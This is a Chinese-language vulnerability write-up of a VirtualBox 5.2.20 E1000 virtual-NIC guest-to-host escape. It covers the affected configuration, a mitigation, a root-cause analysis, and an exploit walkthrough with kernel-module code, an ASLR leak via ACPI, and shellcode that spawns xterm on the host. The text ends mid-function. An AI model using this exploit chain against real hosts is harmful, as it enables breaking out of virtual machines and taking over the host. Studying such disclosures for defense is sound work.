VirtualBox E1000 0day 虚拟机逃逸漏洞(全文已更新)

 

VirtualBox 0day虚拟机逃逸漏洞被发布到Github

在不久之前,VirtualBox的一个虚拟机逃逸漏洞详情被公布到Github上。作者称其非常喜欢VirtualBox,但是作者对现今的信息安全制度深恶痛绝,尤其是漏洞赏金计划!作者提到其最厌恶的三个点:1.持续时间久,提交一个漏洞要等半年才能走完整个流程。2.变动大,可能今天确定的事明天就不确定了。3.收录列表不精确。4.营销太多。作者对此的回应就是:一把梭,就是放,找到一个漏洞就公开一个0day,认为这样能促使信息安全进步。(此非编辑或安全客态度)

目前来看,作者并未售卖漏洞,是个耿直boy了。

 

漏洞基本信息

影响版本:VirtualBox 5.2.20及早期版本

主机系统:任意

客户系统:任意

虚拟机配置:默认(网卡为Intel Pro/1000 MT 桌面版(82540EM)网络模式为NAT)

 

漏洞简介

VirtualBox默认虚拟网络设备为上文的82540EM(NAT模式),以下简称E1000。

E1000存在漏洞,允许guest虚拟机中拥有管理员权限的攻击者转移到主机ring3中,并利用其它方式(/dev/vboxdrv)提权至ring0。

 

漏洞修复

将虚拟机网卡设置为PCnet或半虚拟网络。如果不更改网卡则需将模式从NAT改为其他模式(但前者更安全)。

 

漏洞详情

E1000

虚拟机中发送网络数据包时,guest虚拟机操作与主机类似:配置网卡并提供数据包;数据包是数据链路层帧及更高级别头信息。供到适配器的数据包则封装在Tx描述符中(Tx意为传输)。Tx描述符是82540EM数据表(317453006EN.PDF,Revision 4.0 )中的数据结构,包含包大小、VLAN标记、TCP/IP分段标志等元数据。

82540EM数据表提供了三种Tx描述符类型:Legacy、Context和Data。Legacy基本已被弃用,另外两个则是目前常用的。而这次需要关注的则是Context设置数据包大小、切换TCP/IP分段以及Data保存数据包物理地址和大小。Data数据包大小必须小于Context设置的最大数据包大小,通常先向网卡提交Context后提交Data。

向网卡提交Tx描述符时,猜测会将它们写入到Tx Ring中,此为预定义地址物理内存中的Ring缓冲区。当所有描述符写入Tx Ring中时,guest虚拟机会更新E1000 MMIO TDT寄存器告知主机有新的描述符需要进行处理。

输入

假设以下为一些Tx描述符数组样例

[context_1, data_2, data_3, context_4, data_5]

并假设如下方式分配结构和内容

context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true

data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true

data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

并进行下述分析

根本原因分析

[context_1,data_2,data_3]处理过程

假设上述描述符以指定顺序写入Tx Ring,并更新了TDT寄存器,那么主机将执行src/VBox/Devices/Network/DevE1000.cpp文件中的e1kXmitPending函数。

static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

e1kTxDLazyLoad将读取Tx Ring中的5个Tx描述符,并调用e1kLocateTxPacket。此函数将遍历描述符并初始化,但并不真的去处理它们。第一次调用该函数将会处理context_1,、data_2与data_3。其余两个描述符将在while的第二次循环中处理(下一节中介绍)。这一部分对于漏洞触发至关重要。

e1kLocateTxPacket如下:

static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

context_1是E1K_DTYP_CONTEXT,因此会调用e1kUpdateTxContext函数。如果描述符启用了TCP分段,则会更新TCP分段的上下文。此处就是这种情况。

data_2是E1K_DTYP_DATA,因此执行的操作不重要所以不再讨论。

data_3同上,但data_3.data_length==0所以不执行任何操作。

目前处理了3个描述符,还剩下2个描述符。在switch语句后,检查描述符的end_of_packet字段的值,比如data_3描述符中,data_3.end_of_packet==true,执行一些操作并返回。

        if(pDesc-> legacy.cmd.fEOP)
        { 
            ... return true ; 
        }

如果此处为false,则会处理剩下的2个描述符,这种情况就不会触发该漏洞并导致产生错误。

在e1kLocateTxPacket函数结束时,这三个描述符已经准备好解包发送了。e1kXmitPending函数的内部循环中会继续调用e1kXmitPacket,此函数会遍历处理5个描述符。

static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

每个描述符都会被调用e1kXmitDesc函数。

static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

传给该函数的第一个描述符是context_1,无作用。

传给该函数的第二个描述符是data_2,因为所有描述符中都设置有tcp_segmentation_enable==true(pDesc->data.cmd.fTSE),当调用e1kFallbackAddToFrame时处理data_5就会出现整数溢出。

static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }

        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }

    return VINF_SUCCESS; /// @todo consider rc;
}

此处重要变量是u16MaxPktLen,pThis->u16TxPktLen与pDesc->data.cmd.u20DTALEN。

以下图表为数据描述符执行e1kFallbackAddToFrame函数前后这些变量的值。

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_2 Before 0x3010 0 0x10
After 0x3010 0x10 0
data_3 Before 0x3010 0x10 0
After 0x3010 0x10 0

其中需要关注的是,当处理data_3时,pThis->u16TxPktLen为0x10。

接着,再来看下e1kXmitPacket的末尾部分。

        if(e1kGetDescType(pDesc)!= E1K_DTYP_CONTEXT && pDesc-> legacy.cmd.fEOP)
             break ;

因为data_3不为E1K_DTYP_CONTEXT并且data_3.end_of_packet==true,所以尽管后两个描述符还没处理,循环也将中断。这里非常重要,因为所有Data描述符都是在Context描述符之后处理的。在e1kLocateTxPacket中TCP分段上下文更新时处理Context描述符,并在e1kXmitPacket函数内循环中处理Data描述符,开发人员这种处理是为了在执行过程中禁止改变u16MaxPktLen防止出现整数溢出。

uint32_t cb = u16MaxPktLen  -  pThis-> u16TxPktLen;

但是我们可以绕过这个保护措施,在e1kLocateTxPacket中,data_3.end_of_packet==true,可以强制函数返回,因此有两个描述符留置处理。虽然pThis->u16PktLen为0x10而非0,因此可用context_4.maximux_segment_size来改变u16MaxPktLen造成整数溢出。

[context_4,data_5]处理

再回到e1kXmitPending的循环中看:

            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

这里e1kLocateTxPacket将对context_4与data_5初始化,我们可以将context_4.maximum_segment_size设置为小于已读取数据大小(即0x10)。

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

调用e1kLocateTxPacket过程中,我们将最大段大小设置为0xF,已读取数据大小为0x10。

当处理data_5时,当执行e1kFallbackAddToFrame时变量如下:

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_5 Before 0xF 0x10 0x4188
After

因此会造成整数溢出。

0xFFFFFFFF>0x4188,此处执行如下:

        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }

将调用大小为0x4188的e1kFallbackAddSegment函数,如果没有触发漏洞,这里调用大小是无法超过0x4000的。因为e1kUPdateTxContext中TCP分段上下文更新时会检查最大段大小是否小于等于0x4000。

DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }

缓冲区溢出

在调用了大小为0x4188的e1kFallbackAddSegment函数后,有两种方法可进行利用。首先数据将会从guest虚拟机读入堆缓冲区:

static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

此处pThis->aTxPacketFallback是大小为0x3FA0的缓冲区,u16Len为0x4188,可进行函数指针覆盖。

同时,e1kFallbackAddSegment调用e1kTransmitFrame,可通过E1000寄存器配置调用e1kHandleRxPacket函数,将分配0x4000堆栈缓冲区并将指定长度数据(此处为0x4188长度数据)复制到缓冲区中。

static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

以上两种方式均可进行利用。

 

利用

该漏洞利用Linux内核模块(LKM)加载到guest操作系统中,而在Windows中则需要一个与LKM稍有不同的驱动。

在两种操作系统中提权均需要加载驱动,但通常这并不是一个大问题。比如近年的Pwn2Own中经常就有这种情况。

这个漏洞利用非常稳定,不会因为一些奇奇怪怪的原因失效。在Ubuntu 16.04和18.04 x86_64中默认配置即可实现。

利用过程

1.攻击者先卸载Linux guest虚拟机中默认加载的e1000.ko并加载漏洞利用的LKM。

2.LKM根据数据表初始化E1000,仅初始化发送部分即可。

3.1.LKM禁用E1000环回模式,使得堆栈缓冲区溢出代码不可达。

3.2.LKM利用漏洞造成堆缓冲区溢出。

3.3.堆缓冲区溢出可用E1000 EEPROM在128KB范围内写入任意两个字节,攻击者获得写原语。

3.4.LKM利用写原语8次,将数据写入堆中ACPI(高级配置和电源接口)数据结构。写入堆缓冲区索引变量后从中读取单字节,因为缓冲区大小小于最大索引号255,攻击者可读缓冲区,获得读原语。

3.5.LKM使用读原语8次访问ACPI并从堆中读8字节数据(VBoxDD.so共享库指针)

3.6.LKM将指针减去RVA即可拿到VBoxDD.so库。

4.1.LKM启用E1000环回模式,使得堆栈缓冲区溢出代码可达。

4.2.LKM利用漏洞造成堆栈缓冲区溢出,返回地址(RIP/EIP)被覆盖,攻击者获得控制权。

4.3.利用ROP链执行shellcode。

5.1.shellcode加载器从堆栈处载入shellcode执行。

5.2.shellcode利用fork和execve系统调用执行进程。

6.攻击者卸载LKM并加载e1000.ko并恢复网络。

初始化

LKM映射E1000 MMIO物理内存,物理地址和大小由管理程序预设。

void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;

    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }

    return va;
}

接着配置E1000通用寄存器,分配Tx Ring存储器,配置发送到寄存器。

void e1000_init(void* mmio) {
    // Configure general purpose registers

    configure_CTRL(mmio);

    // Configure TX registers

    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }

    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}

绕过ASLR

写原语

在写漏洞利用的时候,我决定不去用那些默认会被禁用的原语,比如提供3D加速服务的Chromium(去年被发现了40多个漏洞)。

那么我们的重点就应该在VirtualBox的各种子系统中寻找泄露信息。一般来讲,整数溢出导致堆缓冲区溢出后,就可控制缓冲区溢出的内容。从中可以获取读取、写入以及信息泄露原语。

我们详细看下堆溢出的内容:

/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

此处aTxPacketFallback是大小为0x3FA0的缓冲区,在其中搜索后我们可以找到一些比较有趣的结构:E1kEEPROM,具体如下所示:

/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

E1000实现了EEPROM,辅助适配器内存。guest虚拟机可以通过E1000 MMIO寄存器访问它。我们只对EEPROM中的写内存动作感兴趣,如下:

EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}

void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

这里m_u16Addr,m_u16Word和m_fWriteEnabled是我们控制的EEPROM93C46结构的字段。

m_au16Data [u32Addr] = u16Value;

语句将在m_au16Data任意16位偏移处写入2个字节,可以找到一个写原语。

读原语

接下来是如何在堆上找到数据结构以写入任意数据,并试图尝试获取共享库指针。在这过程中尽量不要进行堆喷射,因为虚拟设备的主要数据结构是从内部虚拟机管理程序堆中分配,之间距离恒定。

启动虚拟机时,PDM(可插入设备和驱动程序管理器)子系统在虚拟机管理程序堆中分配PDMDEVINS对象。

int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

GDB下跟踪该部门代码可得以下结果:

[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8

[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8

...

[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0

[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848

[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728

[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570

[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90

[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

E1000设备在0xE位置,其他设备的偏移量为0x5700,0x19E0等等(如上所述,距离相同)。

E1000后就是ICH IC’97,OHCI,ACPI,VirtualBox GIM。

虚拟机启动时,创建ACPI设备(src/VBox/Devices/PC/DevACPI.cpp):

typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

ACPI端口输入输出处理程序注册在0x4100-0x410F,在0x4107端口情况下如下:

PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

当guest操作系统执行INB(0x4107)指令从端口读一个字节时,处理程序从u8SMBusBlkIdx索引处的au8SMBusBlkDat[32]数组中取一个字节并返回给guest虚拟机。应用写原语即如此:因为虚拟设备堆块距离恒定,所以从EEPROM93C46.m_au16Data数组到ACPIState.u8SMBusBlkIdx距离也是一样,将两个字节写入ACPIState.u8SMBusBlkIdx,可以从ACPIState.au8SMBusBlkDat中读255字节范围任意数据。

再来看ACPIState结构,数组在结构末尾,其他字段则用处不大。

gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0:	0xffffe98100000090	0xfffd9b2000000000
0x7fc47008d4f0:	0x00007fc470067a00	0x00007fc470067a00
0x7fc47008d500:	0x00000000a0028a00	0x00000000000e0000
0x7fc47008d510:	0x00000000000e0fff	0x0000000000001000
0x7fc47008d520:	0x000000ff00000002	0x0000100000000000
0x7fc47008d530:	0x00007fc47008c358	0x00007fc44d6ecdc6
0x7fc47008d540:	0x0031000035944000	0x00000000000002b8
0x7fc47008d550:	0x00280001d3878000	0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6:	"ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

有一个指向字符串的指针,该字符串位于VBoxDD.so库固定偏移处,指针位于ACPIState末尾0x58偏移处。我们可以逐字节读该指针,最终获得VBoxDD.so库。我们只希望通过ACPIState结构的数据在每次启动时都不随机。

信息泄露

现在我们把写原语和读原语结合起来利用绕过ASLR。我们将溢出堆覆盖EEPROM93C46结构,并触发EEPROM将索引写入ACPIState结构,在guest虚拟机中执行INB(0x4107)访问ACPI读取指针的一个字节。重复8次后将索引增1。

uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");

    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);

    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();

        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }

    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

    return vboxdd_base;
}

环回模式中,guest虚拟机会将数据包发回给自己,以便发送后立即接收。禁用此模式后,无法访问e1kHandleRxPacket。

DEP

绕过ASLR后,可以启用环回模式并触发堆栈缓冲区溢出。

void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);

    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

    free_buffer(buffer_va);
}

void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");

    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

当执行到e1kHandleRxPacket最后一条指令时,保存的返回地址被覆盖,攻击者可将其转移到任意地址。但仍然需要构建ROP链的方式绕过DEP。

Shellcode

shellcode加载器并不复杂。

use64

start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop

payload:
    ; Here the shellcode is to be

loader_size = $ - start

shellcode执行后第一部分为:

use64

start:
    ; sys_fork
    mov rax, 58
    syscall

    test rax, rax
    jnz continue_process_execution

    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi

    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi

    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall

...

cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

利用fork和execve创建/usr/bin/xterm进程,攻击者获得Ring 3控制权。

继续流程

我们期待的并不是DOS,而是希望继续运行下去。shellcode第二部分负责这一块内容:

continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48

    ; Skip junk
    add rsp, 0x10

    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15

    ; Skip junk
    add rsp, 0x8

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL

    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb

    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0

    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

    ret

当e1kHandleRxPacket被调用时,调用栈为:

#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

接着将跳转到e1kR3NetworkDown_XmitPending,并且不进行其他操作回到管理程序中。

static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
